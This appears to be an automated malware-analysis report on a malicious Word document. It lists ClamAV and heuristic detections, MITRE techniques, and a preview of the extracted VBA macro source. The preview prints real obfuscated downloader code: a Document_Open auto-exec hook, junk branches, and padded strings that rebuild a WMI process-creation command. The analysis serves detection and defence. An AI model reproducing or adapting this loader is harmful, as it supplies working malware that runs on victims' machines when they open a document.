MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro and a hidden-property command stager, indicating malicious intent. The ClamAV detection for 'Doc.Malware.Sagent-9403571-0' further supports this. The VBA script's obfuscation and its use of string concatenation to assemble potentially malicious commands prevent a more detailed analysis of its specific actions, but the overall pattern suggests it is designed to download and execute further malware. The extracted preview is consistent with this: the macro reads the module's HelpContextId property as an arithmetic seed for ChrW, builds a long string padded with a repeated junk separator, and hands that string to a helper function, which matches the Split/Join reconstruction described in the heuristics below.
Heuristics (7)
-
ClamAV: Doc.Malware.Sagent-9403571-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Sagent-9403571-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA UserForm hidden-property command stager — critical — OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15341 bytes |

SHA-256: 02acc1db2c4fa37db6fc1b6af6686e0f3a4431258401bb6e34f334fb12fc7357
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "A_gft0khts2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point (flagged above as OLE_VBA_DOCOPEN): Document_open is the
' handler Word runs when the document is opened. The signature is split across
' two lines with a line-continuation underscore, which breaks naive
' "Sub Document_Open" string matching. The Sub itself does nothing but hand off
' to M_gscuvkdietfxvevz in module Z9mr73gwc6ug8a, so all behaviour of interest
' lives in that function.
Private Sub _
Document_open()
Z9mr73gwc6ug8a.M_gscuvkdietfxvevz
End Sub
Attribute VB_Name = "Z9mr73gwc6ug8a"
Attribute VB_Base = "0{EBC107FD-DB16-42DB-BA20-A81B22A24570}{AC968F29-200E-4CE1-B031-C421FEF98F74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function M_gscuvkdietfxvevz()
Tn83v37dzlbs877ka = "490"
If Len("Vyv6zkj17htyfi1_Jwh_9yc1ugar") = Len("Q7r7x0i7yws68z") + 1 Then End
If Len("Ag5391ty4z8_tefGjsuxgjv33kzSeb0rznnitydhzh201") < Len("Nsjwoe968iagp6zdv") Then
MsgBox "Abq33a15rqsc65btgs" + "Nx6t5reinijtvx"
MsgBox ("Xyl21i7vysm6ohe8y")
MsgBox "Rbjgtwly4mvh" + "Xq_8oiq4hxbhasw1bj"
End If
If Len("Pn9vw2fzpbqtaPqpok1zinqph_s") = Len("S93diwu_6ogj") Then
MsgBox "A23eb2pbhl2uyo_" + "Ep2yu1eyq36bqu"
MsgBox ("Drfhxzkfjcc !!!")
MsgBox "Pauviutz_pw0kxd" + "H8owxlxdsgn37jsv"
End If
Pvgwpf9dz6t4ngr4 = Z9mr73gwc6ug8a.HelpContextId + 50 + 50
Ihiqcukgbl3 = "758"
If Len("S57f63b34dbri435vJ4dq29hlb2xt29g") = Len("Pqsbowdfiif3ik") + 1 Then End
If Len("Lwr0_2jd09u1lfjneVhmmtg2z0is3qT0h9j0gxlnu") < Len("V74a07brndq") Then
MsgBox "Bkik4bvgrq_" + "Ymdfeh7_4pm67"
MsgBox ("Gx2_1ysd6_285j3oxo")
MsgBox "Lcw38mghrly9oo640p" + "Sl56sdoioxho39"
End If
If Len("L7x66xurb3gbms0r50Rwwieyse4uk8") = Len("Zr0_gdv6g64clcb2pf") Then
MsgBox "Lxkm5ytgmt3837" + "B7t_l1nks25f4"
MsgBox ("Lnop7rk1eely8il !!!")
MsgBox "Ybhb_ghp6ycm3v" + "N1v8gos7oam"
End If
U03so10k56k09a04 = ChrW(Pvgwpf9dz6t4ngr4 + (15))
W1r45cowf207m = "80"
If Len("Joqvi47i_n1fMt49jhu7snetxnw") = Len("Fa2zhvjusfpox1") + 1 Then End
If Len("Czq8dn4zy3mAlcwqk54n0qo8kiqdEj3ib5grtcold871i") < Len("Ku_e493fic_5") Then
MsgBox "Jv7wcd4kip02" + "Kb6utgb_bu5cq5r7v"
MsgBox ("Mz9b2hl4wp0g")
MsgBox "Anbu2kzt53gl" + "Buwkloxksc6"
End If
If Len("Hyj1vxa6p5zpkP8vy822zf2gmeut6") = Len("Hhhqxp4iffrxi6") Then
MsgBox "Au52z6fdwvss" + "Gsqlulohcl0s3p3"
MsgBox ("Hc980mu24gxfew6 !!!")
MsgBox "Xjay1fd8qa9j" + "G8qormtuwv891tozj"
End If
Us73fr0esajusj58d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + U03so10k56k09a04 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Z9mr73gwc6ug8a.Lvx1_0xpifn7q + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
Dhk6mo8sk3ja = "629"
If Len("N586grcb4bfbvdgzv3Miy6ouz7z1i37wud") = Len("Bjkbogmge42") + 1 Then End
If Len("S51awt170slrvIukjqa_gxlrxecRj20v08s2kc6i") < Len("N04ra5386n2") Then
MsgBox "Ogpu_pxtkjvt_" + "Lct_nf3ednygdi"
MsgBox ("Uonhko1dhlxhz3k")
MsgBox "Hrvo1n7_vtqdc" + "Vlp0s6hmza20my29cn"
End If
If Len("Zozt66ptow30walslSkqg93ux2bijyrdkd") = Len("C4udcm519ce9ag") Then
MsgBox "Dmcn5r90heoke0" + "Wm96otjwhemi5"
MsgBox ("N4ac6sea9jah5m !!!")
MsgBox "Rbz2xh4ag37717irid" + "Rlnikqg6oy5hz8"
End If
Cihc5veidv3usj = Dsiiu606aot2n2c0j(Us73fr0esajusj58d)
Hif19mrs13xk = "253"
If Len("O_ahgzf56eryxzrlrSfg7vwgiwc_itgs9f") = Len("A7fu4mpezcly_hi89") + 1 Then End
If Len("Pypob9dd6xvlRt
... (truncated)